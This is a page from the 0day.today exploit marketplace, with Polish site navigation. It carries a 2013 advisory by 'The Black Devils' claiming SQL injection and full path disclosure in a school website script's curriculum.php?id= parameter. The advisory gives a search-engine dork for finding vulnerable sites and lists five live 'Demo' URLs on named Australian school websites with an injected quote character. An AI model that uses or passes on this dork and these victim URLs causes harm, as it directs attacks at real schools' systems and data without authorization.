[ home ]  [ prywatne ]  [ 0Day ]  [ discount ]  [ Zdobądź Gold ]  [ platformy ]  [ pentest ]  [ szukaj ]  [ faq ]  [ kontakt ]  [ styl ]  [ Prices in Gold ]   db: 39 443    
0day.today Exploit DB Oficjalny Facebook
0day.today Exploit DB Oficjalny Twitter
0day.today Exploit DB Oficjalny Kanał RSS
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Największa Baza Exploitów na Świecie.
Wybierz język:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Informacje które powinieneś wiedzieć o 0day.today:
  • Korzystamy z jednej głównej domeny: http://0day.today
  • Większość materiałów jest kompletnie DARMOWA
  • Jeżeli chcesz kupić exploita / zdobyć dostęp V.I.P lub zapłacić za którąś z usług,
    musisz zakupić lub zdobyć GOLD
We accept currencies: [contact admin to find more]
           
Nie chcemy byś używał naszej strony jako narzędzia do włamań, więc każdą czynnością która nielegalnie wpływa na innych użytkowników lub cudze witryny, narażasz się na zbanowanie i usunięcie wszystkich materiałów.

Administracja tej strony używa oficjalnej strony kontaktowej. Uważaj na oszustów!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Jestem zarejestrowanym użytkownikiem 0day.today. Nie chcę widzieć tej notyfikacji w przyszłości.
Co na początek?
  1. Przeczytaj [ ugoda ]
  2. Przeczytaj [ Wyślij ] zasady
  3. Odwiedź [ faq ] strona
  4. [ Zarejestruj ] profil
  5. Zdobądź [ GOLD ]
  6. Jeżeli chcesz [ sprzedaj ]
  7. Jeżeli chcesz [ kup ]
  8. Jeżeli stracisz [ Konto ]
  9. Jakiekolwiek pytania [ [email protected] ]


Główne linki


Możesz się z nami skonaktować przez

Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ autoryzacja ] [ rejestracja ] [ odzyskaj konto ]
Skontaktuj się
Możesz się z nami skonaktować przez:
Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Market Exploitów i Baza Exploitów 0day

school website design sql injetion / Full Path discolure vulnerability

Autor
The Black Devils
Ryzyko
[
Średnie Zagrożenie Bezpieczeństwa
]
0day-ID
0day-ID-20200
Kategoria
web applications
Data dodania
19-01-2013
Platforma
php
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm The Black Devils member from Inj3ct0r Team         1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: school website design  sql injetion / Full Path discolure vulnerability
# Date: 11/01/2013
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Phone : +447024073406
# Vendor : [ N / A ]
# Category : [ webapps ]
# Dork:  school website design inurl:curriculum.php?id=
# Type : php
# Tested on: [Windows] & [Ubuntu]

http://localhost/curriculum.php?id= [sql Injection]


when you put ' after the link the full path shows 
Demo
http://www.sbc.qld.edu.au/curriculum.php?id=65'
http://www.blaxlandhigh.com.au/curriculum.php?id=29'
http://www.spcc.nsw.edu.au/curriculum.php?id='734
http://www.ogps.vic.edu.au/curriculum.php?id=4'
http://www.stdympnas.qld.edu.au/curriculum.php?id='13




#------------------
Greet's To:r0073r & sH3LL05Dz & Dz-CombatanT & all Inj3ctor Team & Arab47.com & is-sec.org Members & 
Newbie3viLc063s & All The Algerian Hackerz
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

#  0day.today [2024-07-02]  #
0day.today Exploit Database kupuj i sprzedawaj exploity (local, remote, DoS, PoC, etc.)
Wszystkie zgłoszenia składać na mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team